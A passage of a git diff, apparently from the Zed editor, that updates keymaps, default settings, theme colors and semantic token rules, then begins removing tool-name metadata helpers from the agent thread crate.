"alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/linux/cursor.json b/assets/keymaps/linux/cursor.json index e1eeade9db16d178fb2ce0ec4b2ec03f0ac2c221..8d5f7b5a76cb09a6c1be2638019f9cd6cf9942de 100644 --- a/assets/keymaps/linux/cursor.json +++ b/assets/keymaps/linux/cursor.json @@ -20,7 +20,6 @@ "ctrl-shift-l": "agent::AddSelectionToThread", // In cursor uses "Ask" mode "ctrl-l": "agent::AddSelectionToThread", // In cursor uses "Agent" mode "ctrl-k": "assistant::InlineAssist", - "ctrl-shift-k": "assistant::InsertIntoEditor", }, }, { @@ -34,7 +33,7 @@ }, }, { - "context": "AgentPanel || ContextEditor || (MessageEditor > Editor)", + "context": "AgentPanel || (MessageEditor > Editor)", "use_key_equivalents": true, "bindings": { "ctrl-i": "workspace::ToggleRightDock", @@ -47,7 +46,6 @@ "ctrl-shift-backspace": "editor::Cancel", "ctrl-r": "agent::NewThread", "ctrl-shift-v": "editor::Paste", - "ctrl-shift-k": "assistant::InsertIntoEditor", // "escape": "agent::ToggleFocus" ///// Enable when Zed supports multiple thread tabs // "ctrl-t": // new thread tab diff --git a/assets/keymaps/linux/jetbrains.json b/assets/keymaps/linux/jetbrains.json index bdf3949b3f9203220978ff599e0187513d6a976f..98d5cf93106f35e488ab70a60468fa2239cb08c0 100644 --- a/assets/keymaps/linux/jetbrains.json +++ b/assets/keymaps/linux/jetbrains.json @@ -81,6 +81,13 @@ "ctrl-\\": "assistant::InlineAssist", }, }, + { + "context": "Editor && mode == auto_height", + "bindings": { + "shift-enter": "editor::Newline", + "ctrl-shift-enter": "editor::NewlineBelow", + }, + }, { "context": "BufferSearchBar", "bindings": { diff --git a/assets/keymaps/macos/cursor.json b/assets/keymaps/macos/cursor.json index 2824575a445ad0c870a59cb516441dc6f1421f31..f7cab89fb6118777ea07268cdeef2cf440c7b077 100644 --- a/assets/keymaps/macos/cursor.json +++ b/assets/keymaps/macos/cursor.json @@ -20,7 +20,6 @@ "cmd-shift-l": "agent::AddSelectionToThread", // In cursor uses "Ask" mode "cmd-l": "agent::AddSelectionToThread", // In cursor uses "Agent" mode "cmd-k": "assistant::InlineAssist", - "cmd-shift-k": "assistant::InsertIntoEditor", }, }, { @@ -35,7 +34,7 @@ }, }, { - "context": "AgentPanel || ContextEditor || (MessageEditor > Editor)", + "context": "AgentPanel || (MessageEditor > Editor)", "use_key_equivalents": true, "bindings": { "cmd-i": "workspace::ToggleRightDock", @@ -48,7 +47,6 @@ "cmd-shift-backspace": "editor::Cancel", "cmd-r": "agent::NewThread", "cmd-shift-v": "editor::Paste", - "cmd-shift-k": "assistant::InsertIntoEditor", // "escape": "agent::ToggleFocus" ///// Enable when Zed supports multiple thread tabs // "cmd-t": // new thread tab diff --git a/assets/keymaps/macos/jetbrains.json b/assets/keymaps/macos/jetbrains.json index c9106e4d49671f16917b1322824c2edfcd0e7700..304ffb86e8c2fd08fb756b015490f8c4ac424f58 100644 --- a/assets/keymaps/macos/jetbrains.json +++ b/assets/keymaps/macos/jetbrains.json @@ -33,6 +33,7 @@ "cmd-+": "editor::UnfoldLines", "alt-shift-g": "editor::SplitSelectionIntoLines", "ctrl-g": ["editor::SelectNext", { "replace_newest": false }], + "ctrl-shift-g": "editor::UndoSelection", "ctrl-cmd-g": ["editor::SelectPrevious", { "replace_newest": false }], "cmd-/": ["editor::ToggleComments", { "advance_downwards": true }], "alt-up": "editor::SelectLargerSyntaxNode", @@ -79,6 +80,13 @@ "cmd-\\": "assistant::InlineAssist", }, }, + { + "context": "Editor && mode == auto_height", + "bindings": { + "shift-enter": "editor::Newline", + "ctrl-shift-enter": "editor::NewlineBelow", + }, + }, { "context": "BufferSearchBar", "bindings": { diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 1f2742f982bc2165181a797e577b350f5630def9..220b44ff537ffa791b23c0c5b7d86b6768d74dc2 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -337,6 +337,8 @@ "shift-j": "vim::JoinLines", "i": "vim::InsertBefore", "a": "vim::InsertAfter", + "o": "vim::InsertLineBelow", + "shift-o": "vim::InsertLineAbove", "p": "vim::Paste", "u": "vim::Undo", "r": "vim::PushReplace", @@ -427,6 +429,7 @@ "escape": "vim::SwitchToHelixNormalMode", "i": "vim::HelixInsert", "a": "vim::HelixAppend", + "shift-a": "vim::HelixInsertEndOfLine", "ctrl-[": "editor::Cancel", }, }, @@ -510,8 +513,8 @@ "g shift-u": "git::UnstageAndNext", // Zed specific // Window mode - "space w v": "pane::SplitDown", - "space w s": "pane::SplitRight", + "space w v": "pane::SplitRight", + "space w s": "pane::SplitDown", "space w h": "workspace::ActivatePaneLeft", "space w j": "workspace::ActivatePaneDown", "space w k": "workspace::ActivatePaneUp", @@ -1014,7 +1017,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, "bindings": { "k": "menu::SelectPrevious", @@ -1059,7 +1062,7 @@ }, }, { - "context": "Editor && edit_prediction", + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "bindings": { // This is identical to the binding in the base keymap, but the vim bindings above to // "vim::Tab" shadow it, so it needs to be bound again. @@ -1072,15 +1075,7 @@ "enter": "agent::Chat", }, }, - { - "context": "os != macos && Editor && edit_prediction_conflict", - "bindings": { - // alt-l is provided as an alternative to tab/alt-tab. and will be displayed in the UI. This - // is because alt-tab may not be available, as it is often used for window switching on Linux - // and Windows. - "alt-l": "editor::AcceptEditPrediction", - }, - }, + { "context": "SettingsWindow > NavigationMenu && !search", "bindings": { @@ -1099,6 +1094,9 @@ "ctrl-d": "markdown::ScrollPageDown", "ctrl-y": "markdown::ScrollUp", "ctrl-e": "markdown::ScrollDown", + "g g": "markdown::ScrollToTop", + "shift-g": "markdown::ScrollToBottom", + "/": "buffer_search::Deploy", }, }, { @@ -1118,4 +1116,31 @@ "k": "notebook::NotebookMoveUp", }, }, + { + "context": "ThreadsSidebar && !Editor", + "bindings": { + "j": "menu::SelectNext", + "k": "menu::SelectPrevious", + "h": "menu::SelectParent", + "l": "menu::SelectChild", + "g g": "menu::SelectFirst", + "shift-g": "menu::SelectLast", + "/": "agents_sidebar::FocusSidebarFilter", + "z a": "editor::ToggleFold", + "z c": "menu::SelectParent", + "z o": "menu::SelectChild", + "z shift-m": "editor::FoldAll", + "z shift-r": "editor::UnfoldAll", + }, + }, + { + "context": "ThreadsSidebar > Editor && VimControl && vim_mode == normal", + "bindings": { + "j": "editor::MoveDown", + "k": "editor::MoveUp", + "/": "vim::SwitchToInsertMode", + "escape": "menu::Cancel", + "enter": "editor::Newline", + }, + }, ] diff --git a/assets/settings/default.json b/assets/settings/default.json index 8f724f59b66486b6477fc19155d78c7dd89d33c8..63e906e3b11206fc458f8d7353f3ecba0abeb825 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -225,6 +225,11 @@ // 3. Hide on both typing and cursor movement: // "on_typing_and_movement" "hide_mouse": "on_typing_and_movement", + // Determines whether the focused panel follows the mouse location. + "focus_follows_mouse": { + "enabled": false, + "debounce_ms": 250, + }, // Determines how snippets are sorted relative to other completion items. // // 1. Place snippets at the top of the completion list: @@ -299,6 +304,13 @@ // // Default: split "diff_view_style": "split", + // The minimum width (in em-widths) at which the split diff view is used. + // When the editor is narrower than this, the diff view automatically + // switches to unified mode and switches back when the editor is wide + // enough. Set to 0 to disable automatic switching. + // + // Default: 100 + "minimum_split_diff_width": 100, // Show method signatures in the editor, when inside parentheses. "auto_signature_help": false, // Whether to show the signature help after completion or a bracket pair inserted. @@ -361,8 +373,11 @@ // bracket, brace, single or double quote characters. // For example, when you select text and type '(', Zed will surround the text with (). "use_auto_surround": true, - // Whether indentation should be adjusted based on the context whilst typing. - "auto_indent": true, + // Controls automatic indentation behavior when typing. + // - "syntax_aware": Adjusts indentation based on syntax context (default) + // - "preserve_indent": Preserves current line's indentation on new lines + // - "none": No automatic indentation + "auto_indent": "syntax_aware", // Whether indentation of pasted content should be adjusted based on the context. "auto_indent_on_paste": true, // Controls how the editor handles the autoclosed characters. @@ -457,12 +472,10 @@ "show_sign_in": true, // Whether to show the menus in the titlebar. "show_menus": false, + // The layout of window control buttons in the title bar (Linux only). + "button_layout": "platform_default", }, "audio": { - // Opt into the new audio system. - "experimental.rodio_audio": false, - // Requires 'rodio_audio: true' - // // Automatically increase or decrease you microphone's volume. This affects how // loud you sound to others. // @@ -471,33 +484,10 @@ // audio and has auto speaker volume on this will make you very loud // compared to other speakers. "experimental.auto_microphone_volume": false, - // Requires 'rodio_audio: true' - // - // Automatically increate or decrease the volume of other call members. - // This only affects how things sound for you. - "experimental.auto_speaker_volume": true, - // Requires 'rodio_audio: true' - // - // Remove background noises. Works great for typing, cars, dogs, AC. Does - // not work well on music. - "experimental.denoise": true, - // Requires 'rodio_audio: true' - // - // Use audio parameters compatible with the previous versions of - // experimental audio and non-experimental audio. When this is false you - // will sound strange to anyone not on the latest experimental audio. In - // the future we will migrate by setting this to false - // - // You need to rejoin a call for this setting to apply - "experimental.legacy_audio_compatible": true, - // Requires 'rodio_audio: true' - // // Select specific output audio device. // `null` means use system default. // Any unrecognized output device will fall back to system default. "experimental.output_audio_device": null, - // Requires 'rodio_audio: true' - // // Select specific input audio device. // `null` means use system default. // Any unrecognized input device will fall back to system default. @@ -765,6 +755,9 @@ // 5. Never show the scrollbar: // "never" "show": null, + // Whether to allow horizontal scrolling in the project panel. + // When false, the view is locked to the leftmost position and long file names are clipped. + "horizontal_scroll": true, }, // Which files containing diagnostic errors/warnings to mark in the project panel. // This setting can take the following three values: @@ -800,7 +793,9 @@ // "files_first" "sort_mode": "directories_first", // Whether to show error and warning count badges next to file names in the project panel. - "diagnostic_badges": true, + "diagnostic_badges": false, + // Whether to show the git status indicator next to file names in the project panel. + "git_status_indicator": false, // Whether to enable drag-and-drop operations in the project panel. "drag_and_drop": true, // Whether to hide the root entry when only one folder is open in the window; @@ -892,6 +887,14 @@ // Choices: label_color, icon // Default: icon "status_style": "icon", + // Whether to show file icons in the git panel. + // + // Default: false + "file_icons": false, + // Whether to show folder icons or chevrons for directories in the git panel. + // + // Default: true + "folder_icons": true, // What branch name to use if `init.defaultBranch` is not set // // Default: main @@ -908,6 +911,14 @@ /// /// Default: false "tree_view": false, + // Whether the git panel should open on startup. + // + // Default: false + "starts_open": false, + // Whether to show a badge on the git panel icon with the count of uncommitted changes. + // + // Default: false + "show_count_badge": false, "scrollbar": { // When to show the scrollbar in the git panel. // @@ -917,8 +928,8 @@ }, // Whether to show the addition/deletion change count next to each file in the Git panel. // - // Default: false - "diff_stats": false, + // Default: true + "diff_stats": true, }, "message_editor": { // Whether to automatically replace emoji shortcodes with emoji characters. @@ -932,6 +943,8 @@ "dock": "right", // Default width of the notification panel. "default_width": 380, + // Whether to show a badge on the notification panel icon with the count of unread notifications. + "show_count_badge": false, }, "agent": { // Whether the inline assistant should use streaming tools, when available @@ -942,12 +955,16 @@ "button": true, // Where to dock the agent panel. Can be 'left', 'right' or 'bottom'. "dock": "right", + // Whether the agent panel should use flexible (proportional) sizing. + // + // Default: true + "flexible": true, + // Where to position the sidebar. Can be 'left' or 'right'. + "sidebar_side": "left", // Default width when the agent panel is docked to the left or right. "default_width": 640, // Default height when the agent panel is docked to the bottom. "default_height": 320, - // The view to use by default (thread, or text_thread) - "default_view": "thread", // The default model to use when creating new threads. "default_model": { // The provider to use. @@ -1049,6 +1066,7 @@ "spawn_agent": true, "terminal": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1068,6 +1086,7 @@ "grep": true, "spawn_agent": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1077,6 +1096,10 @@ "tools": {}, }, }, + // Whether to start a new thread in the current local project or in a new Git worktree. + // + // Default: local_project + "new_thread_location": "local_project", // Where to show notifications when the agent has either completed // its response, or else needs confirmation before it can run a // tool action. @@ -1084,11 +1107,14 @@ // "all_screens" - Show these notifications on all screens // "never" - Never show these notifications "notify_when_agent_waiting": "primary_screen", - // Whether to play a sound when the agent has either completed + // When to play a sound when the agent has either completed // its response, or needs user input. - - // Default: false - "play_sound_when_agent_done": false, + // "never" - Never play the sound + // "when_hidden" - Only play the sound when the agent panel is not visible + // "always" - Always play the sound + // + // Default: never + "play_sound_when_agent_done": "never", // Whether to have edit cards in the agent panel expanded, showing a preview of the full diff. // // Default: true @@ -1097,6 +1123,10 @@ // // Default: true "expand_terminal_card": true, + // How thinking blocks should be displayed by default in the agent panel. + // + // Default: auto + "thinking_display": "auto", // Whether clicking the stop button on a running terminal tool should also cancel the agent's generation. // Note that this only applies to the stop button, not to ctrl+c inside the terminal. // @@ -1114,6 +1144,11 @@ // // Default: false "show_turn_stats": false, + // Whether to show the merge conflict indicator in the status bar + // that offers to resolve conflicts using the agent. + // + // Default: true + "show_merge_conflict_indicator": true, }, // Whether the screen sharing icon is shown in the os status bar. "show_call_status_icon": true, @@ -1279,6 +1314,8 @@ // * "indexed": Use only the files Zed had indexed // * "smart": Be smart and search for ignored when called from a gitignored worktree "include_ignored": "smart", + // Whether to include text channels in file finder results. + "include_channels": false, }, // Whether or not to remove any trailing whitespace from lines of a buffer // before saving it. @@ -1339,6 +1376,12 @@ "hard_tabs": false, // How many columns a tab should occupy. "tab_size": 4, + // Number of lines to search for modelines at the beginning and end of files. + // Modelines contain editor directives (e.g., vim/emacs settings) that configure + // the editor behavior for specific files. + // + // A value of 0 disables modelines support. + "modeline_lines": 5, // What debuggers are preferred by default for all languages. "debuggers": [], // Whether to enable word diff highlighting in the editor. @@ -1570,13 +1613,6 @@ "model": "codestral-latest", "max_tokens": 150, }, - "sweep": { - // When enabled, Sweep will not store edit prediction inputs or outputs. - // When disabled, Sweep may collect data including buffer contents, - // diagnostics, file paths, repository names, and generated predictions - // to improve the service. - "privacy_mode": false, - }, "ollama": { "api_url": "http://localhost:11434", "model": "qwen2.5-coder:7b-base", @@ -1589,9 +1625,6 @@ "prompt_format": "infer", "max_output_tokens": 64, }, - // Whether edit predictions are enabled when editing text threads in the agent panel. - // This setting has no effect if globally disabled. - "enabled_in_text_threads": true, }, // Settings specific to journaling "journal": { @@ -1607,6 +1640,8 @@ "status_bar": { // Whether to show the status bar. "experimental.show": true, + // Whether to show the name of the active file in the status bar. + "show_active_file": false, // Whether to show the active language button in the status bar. "active_language_button": true, // Whether to show the cursor position button in the status bar. @@ -1635,6 +1670,10 @@ "shell": "system", // Where to dock terminals panel. Can be `left`, `right`, `bottom`. "dock": "bottom", + // Whether the terminal panel should use flexible (proportional) sizing. + // + // Default: true + "flexible": true, // Default width when the terminal is docked to the left or right. "default_width": 640, // Default height when the terminal is docked to the bottom. @@ -1831,8 +1870,8 @@ " (", " # multi-char path: first char (not opening delimiter, space, or box drawing char)", " [^({\\[<\"'`\\ \\u2500-\\u257F]", - " # middle chars: non-space, and colon/paren only if not followed by digit/paren", - " ([^\\ :(]|[:(][^0-9()])*", + " # middle chars: non-space, and colon/paren only if not followed by digit/paren/space", + " ([^\\ :(]|[:(][^0-9()\\ ])*", " # last char: not closing delimiter or colon", " [^()}\\]>\"'`.,;:\\ ]", " |", @@ -1847,6 +1886,8 @@ // Timeout for hover and Cmd-click path hyperlink discovery in milliseconds. Specifying a // timeout of `0` will disable path hyperlinking in terminal. "path_hyperlink_timeout_ms": 1, + // Whether to show a badge on the terminal panel icon with the count of open terminals. + "show_count_badge": false, }, "code_actions_on_format": {}, // Settings related to running tasks. @@ -2012,9 +2053,12 @@ "remove_trailing_whitespace_on_save": false, "ensure_final_newline_on_save": false, }, - "Elixir": { + "EEx": { "language_servers": ["elixir-ls", "!expert", "!next-ls", "!lexical", "..."], }, + "Elixir": { + "language_servers": ["elixir-ls", "!expert", "!next-ls", "!lexical", "!emmet-language-server", "..."], + }, "Elm": { "tab_size": 4, }, @@ -2038,7 +2082,7 @@ "allowed": true, }, }, - "HEEX": { + "HEEx": { "language_servers": ["elixir-ls", "!expert", "!next-ls", "!lexical", "..."], }, "HTML": { @@ -2140,7 +2184,7 @@ }, }, "Starlark": { - "language_servers": ["starpls", "!buck2-lsp", "..."], + "language_servers": ["starpls", "!buck2-lsp", "!tilt", "..."], }, "Svelte": { "language_servers": ["svelte-language-server", "..."], @@ -2211,6 +2255,9 @@ "api_url": "https://api.openai.com/v1", }, "openai_compatible": {}, + "opencode": { + "api_url": "https://opencode.ai/zen", + }, "open_router": { "api_url": "https://openrouter.ai/api/v1", }, @@ -2370,6 +2417,7 @@ "toggle_relative_line_numbers": false, "use_system_clipboard": "always", "use_smartcase_find": false, + "use_regex_search": true, "gdefault": false, "highlight_on_yank_duration": 200, "custom_digraphs": {}, @@ -2495,21 +2543,31 @@ "format_dap_log_messages": true, "button": true, }, - // Configures any number of settings profiles that are temporarily applied on - // top of your existing user settings when selected from - // `settings profile selector: toggle`. + // Configures any number of settings profiles that are temporarily applied + // when selected from `settings profile selector: toggle`. + // + // Each profile has an optional `base` ("user" or "default") and a `settings` + // object. When `base` is "user" (the default), the profile applies on top of + // your user settings. When `base` is "default", user settings are ignored and + // the profile applies on top of Zed's defaults. + // // Examples: // "profiles": { // "Presenting": { - // "agent_ui_font_size": 20.0, - // "buffer_font_size": 20.0, - // "theme": "One Light", - // "ui_font_size": 20.0 + // "base": "default", + // "settings": { + // "agent_ui_font_size": 20.0, + // "buffer_font_size": 20.0, + // "theme": "One Light", + // "ui_font_size": 20.0 + // } // }, // "Python (ty)": { - // "languages": { - // "Python": { - // "language_servers": ["ty"] + // "settings": { + // "languages": { + // "Python": { + // "language_servers": ["ty"] + // } // } // } // } diff --git a/assets/settings/default_semantic_token_rules.json b/assets/settings/default_semantic_token_rules.json index c5e9d1438cad583e78bc3e109b4bc79c62aa7ac5..c070a253d3065feff6647123b5f687e94f5e85d6 100644 --- a/assets/settings/default_semantic_token_rules.json +++ b/assets/settings/default_semantic_token_rules.json @@ -2,7 +2,9 @@ // // These rules map LSP semantic token types to syntax theme styles. // To customize, add rules to "semantic_token_rules" in your settings.json. -// User-defined rules are prepended to these defaults and take precedence. +// User-defined rules are prepended and take highest precedence. +// Extension language rules are applied next. +// These built-in defaults are applied last. // // Each rule has the following properties: // - `token_type`: The LSP semantic token type to match. If omitted, matches all types. @@ -117,6 +119,16 @@ "style": ["type"], }, // References + { + "token_type": "parameter", + "token_modifiers": ["declaration"], + "style": ["variable.parameter"] + }, + { + "token_type": "parameter", + "token_modifiers": ["definition"], + "style": ["variable.parameter"] + }, { "token_type": "parameter", "token_modifiers": [], @@ -199,6 +211,11 @@ "token_modifiers": [], "style": ["comment"], }, + { + "token_type": "string", + "token_modifiers": ["documentation"], + "style": ["string.doc"], + }, { "token_type": "string", "token_modifiers": [], diff --git a/assets/settings/initial_tasks.json b/assets/settings/initial_tasks.json index 5bedafbd3a1e75a755598e37cd673742e146fdcc..bb6c9c04ae14db8f2d01adabd8d1494caa7d7407 100644 --- a/assets/settings/initial_tasks.json +++ b/assets/settings/initial_tasks.json @@ -48,6 +48,11 @@ "show_summary": true, // Whether to show the command line in the output of the spawned task, defaults to `true`. "show_command": true, + // Which edited buffers to save before running the task: + // * `all` — save all edited buffers + // * `current` — save currently active buffer only + // * `none` — don't save any buffers + "save": "none", // Represents the tags for inline runnable indicators, or spawning multiple tasks at once. // "tags": [] }, diff --git a/assets/themes/ayu/ayu.json b/assets/themes/ayu/ayu.json index e2b7c3c91fca46ab0e4064719bea5c8793faaccc..f27566c4f72cac3938a752c64d95d0500c595306 100644 --- a/assets/themes/ayu/ayu.json +++ b/assets/themes/ayu/ayu.json @@ -71,31 +71,31 @@ "terminal.background": "#0d1016ff", "terminal.foreground": "#bfbdb6ff", "terminal.bright_foreground": "#bfbdb6ff", - "terminal.dim_foreground": "#0d1016ff", + "terminal.dim_foreground": "#85847fff", "terminal.ansi.black": "#0d1016ff", "terminal.ansi.bright_black": "#545557ff", - "terminal.ansi.dim_black": "#bfbdb6ff", + "terminal.ansi.dim_black": "#3a3b3cff", "terminal.ansi.red": "#ef7177ff", "terminal.ansi.bright_red": "#83353bff", - "terminal.ansi.dim_red": "#febab9ff", + "terminal.ansi.dim_red": "#a74f53ff", "terminal.ansi.green": "#aad84cff", "terminal.ansi.bright_green": "#567627ff", - "terminal.ansi.dim_green": "#d8eca8ff", + "terminal.ansi.dim_green": "#769735ff", "terminal.ansi.yellow": "#feb454ff", "terminal.ansi.bright_yellow": "#92582bff", - "terminal.ansi.dim_yellow": "#ffd9aaff", + "terminal.ansi.dim_yellow": "#b17d3aff", "terminal.ansi.blue": "#5ac1feff", "terminal.ansi.bright_blue": "#27618cff", - "terminal.ansi.dim_blue": "#b7dffeff", + "terminal.ansi.dim_blue": "#3e87b1ff", "terminal.ansi.magenta": "#39bae5ff", "terminal.ansi.bright_magenta": "#205a78ff", - "terminal.ansi.dim_magenta": "#addcf3ff", + "terminal.ansi.dim_magenta": "#2782a0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#bfbdb6ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#787876ff", + "terminal.ansi.dim_white": "#85847fff", "link_text.hover": "#5ac1feff", "conflict": "#feb454ff", "conflict.background": "#572815ff", @@ -283,7 +283,7 @@ "font_weight": null }, "preproc": { - "color": "#bfbdb6ff", + "color": "#ff8f3fff", "font_style": null, "font_weight": null }, @@ -391,6 +391,16 @@ "color": "#5ac1feff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#aad94cff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#f07178ff", + "font_style": null, + "font_weight": null } } } @@ -675,7 +685,7 @@ "font_weight": null }, "preproc": { - "color": "#5c6166ff", + "color": "#fa8d3eff", "font_style": null, "font_weight": null }, @@ -783,6 +793,16 @@ "color": "#3b9ee5ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#6cbf43ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#ff6666ff", + "font_style": null, + "font_weight": null } } } @@ -855,31 +875,31 @@ "terminal.background": "#242835ff", "terminal.foreground": "#cccac2ff", "terminal.bright_foreground": "#cccac2ff", - "terminal.dim_foreground": "#242835ff", + "terminal.dim_foreground": "#8e8d87ff", "terminal.ansi.black": "#242835ff", "terminal.ansi.bright_black": "#67696eff", - "terminal.ansi.dim_black": "#cccac2ff", + "terminal.ansi.dim_black": "#48494dff", "terminal.ansi.red": "#f18779ff", "terminal.ansi.bright_red": "#833f3cff", - "terminal.ansi.dim_red": "#fec4baff", + "terminal.ansi.dim_red": "#a85e54ff", "terminal.ansi.green": "#d5fe80ff", "terminal.ansi.bright_green": "#75993cff", - "terminal.ansi.dim_green": "#ecffc1ff", + "terminal.ansi.dim_green": "#95b159ff", "terminal.ansi.yellow": "#fecf72ff", "terminal.ansi.bright_yellow": "#937237ff", - "terminal.ansi.dim_yellow": "#ffe7b9ff", + "terminal.ansi.dim_yellow": "#b1904fff", "terminal.ansi.blue": "#72cffeff", "terminal.ansi.bright_blue": "#336d8dff", - "terminal.ansi.dim_blue": "#c1e7ffff", + "terminal.ansi.dim_blue": "#4f90b1ff", "terminal.ansi.magenta": "#5bcde5ff", "terminal.ansi.bright_magenta": "#2b6c7bff", - "terminal.ansi.dim_magenta": "#b7e7f2ff", + "terminal.ansi.dim_magenta": "#3f8fa0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#cccac2ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#898a8aff", + "terminal.ansi.dim_white": "#8e8d87ff", "link_text.hover": "#72cffeff", "conflict": "#fecf72ff", "conflict.background": "#574018ff", @@ -1067,7 +1087,7 @@ "font_weight": null }, "preproc": { - "color": "#cccac2ff", + "color": "#ffad65ff", "font_style": null, "font_weight": null }, @@ -1175,6 +1195,16 @@ "color": "#72cffeff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#aad94cff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#f07178ff", + "font_style": null, + "font_weight": null } } } diff --git a/assets/themes/gruvbox/gruvbox.json b/assets/themes/gruvbox/gruvbox.json index 16ae188712f7a800ab4fb8a81a2d24cac99da56b..4330df54fccae55e7ca077c0da9a891ee71ebe3a 100644 --- a/assets/themes/gruvbox/gruvbox.json +++ b/assets/themes/gruvbox/gruvbox.json @@ -293,7 +293,7 @@ "font_weight": null }, "preproc": { - "color": "#fbf1c7ff", + "color": "#fb4833ff", "font_style": null, "font_weight": null }, @@ -406,6 +406,16 @@ "color": "#83a598ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#b8bb26ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#fb4934ff", + "font_style": null, + "font_weight": null } } } @@ -700,7 +710,7 @@ "font_weight": null }, "preproc": { - "color": "#fbf1c7ff", + "color": "#fb4833ff", "font_style": null, "font_weight": null }, @@ -813,6 +823,16 @@ "color": "#83a598ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#b8bb26ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#fb4934ff", + "font_style": null, + "font_weight": null } } } @@ -1107,7 +1127,7 @@ "font_weight": null }, "preproc": { - "color": "#fbf1c7ff", + "color": "#fb4833ff", "font_style": null, "font_weight": null }, @@ -1220,6 +1240,16 @@ "color": "#83a598ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#b8bb26ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#fb4934ff", + "font_style": null, + "font_weight": null } } } @@ -1514,7 +1544,7 @@ "font_weight": null }, "preproc": { - "color": "#282828ff", + "color": "#9d0006ff", "font_style": null, "font_weight": null }, @@ -1627,6 +1657,16 @@ "color": "#0b6678ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#79740eff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#9d0006ff", + "font_style": null, + "font_weight": null } } } @@ -1921,7 +1961,7 @@ "font_weight": null }, "preproc": { - "color": "#282828ff", + "color": "#9d0006ff", "font_style": null, "font_weight": null }, @@ -2034,6 +2074,16 @@ "color": "#0b6678ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#79740eff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#9d0006ff", + "font_style": null, + "font_weight": null } } } @@ -2328,7 +2378,7 @@ "font_weight": null }, "preproc": { - "color": "#282828ff", + "color": "#9d0006ff", "font_style": null, "font_weight": null }, @@ -2441,6 +2491,16 @@ "color": "#0b6678ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#79740eff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#9d0006ff", + "font_style": null, + "font_weight": null } } } diff --git a/assets/themes/one/one.json b/assets/themes/one/one.json index 05af3f5cfeec7d4a24c4fe6d684fb21d04e2d81c..e60b6314b9595ac02bd6a43be4580ba9331ae769 100644 --- a/assets/themes/one/one.json +++ b/assets/themes/one/one.json @@ -290,7 +290,7 @@ "font_weight": null }, "preproc": { - "color": "#dce0e5ff", + "color": "#b477cfff", "font_style": null, "font_weight": null }, @@ -403,6 +403,16 @@ "color": "#73ade9ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#98c379ff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#e06c75ff", + "font_style": null, + "font_weight": null } } } @@ -692,7 +702,7 @@ "font_weight": null }, "preproc": { - "color": "#242529ff", + "color": "#a449abff", "font_style": null, "font_weight": null }, @@ -805,6 +815,16 @@ "color": "#5b79e3ff", "font_style": null, "font_weight": null + }, + "diff.plus": { + "color": "#50a14fff", + "font_style": null, + "font_weight": null + }, + "diff.minus": { + "color": "#e45649ff", + "font_style": null, + "font_weight": null } } } diff --git a/crates/acp_thread/Cargo.toml b/crates/acp_thread/Cargo.toml index 83cf86bfafc33e4d1b520ca5af04da626831aed7..7ef53bc522708680e64cfcc9ce2860990bfd7d13 100644 --- a/crates/acp_thread/Cargo.toml +++ b/crates/acp_thread/Cargo.toml @@ -59,7 +59,5 @@ indoc.workspace = true parking_lot.workspace = true project = { workspace = true, "features" = ["test-support"] } rand.workspace = true -tempfile.workspace = true util.workspace = true settings.workspace = true -zlog.workspace = true diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index be681a846f7963950370095f50095160649d1fcd..36c9fb40c4a573e09da05618a29c1898cced60ad 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -2,55 +2,23 @@ mod connection; mod diff; mod mention; mod terminal; - -/// Key used in ACP ToolCall meta to store the tool's programmatic name. -/// This is a workaround since ACP's ToolCall doesn't have a dedicated name field. -pub const TOOL_NAME_META_KEY: &str = "tool_name"; - -/// Key used in ACP ToolCall meta to store the session id when a subagent is spawned. -pub const SUBAGENT_SESSION_ID_META_KEY: &str = "subagent_session_id"; - -/// Helper to extract tool name from ACP meta -pub fn tool_name_from_meta(meta: &Option) -> Option { - meta.as_ref() - .and_then(|m| m.get(TOOL_NAME_META_KEY)) - .and_then(|v| v.as_str()) - .map(|s| SharedString::from(s.to_owned())) 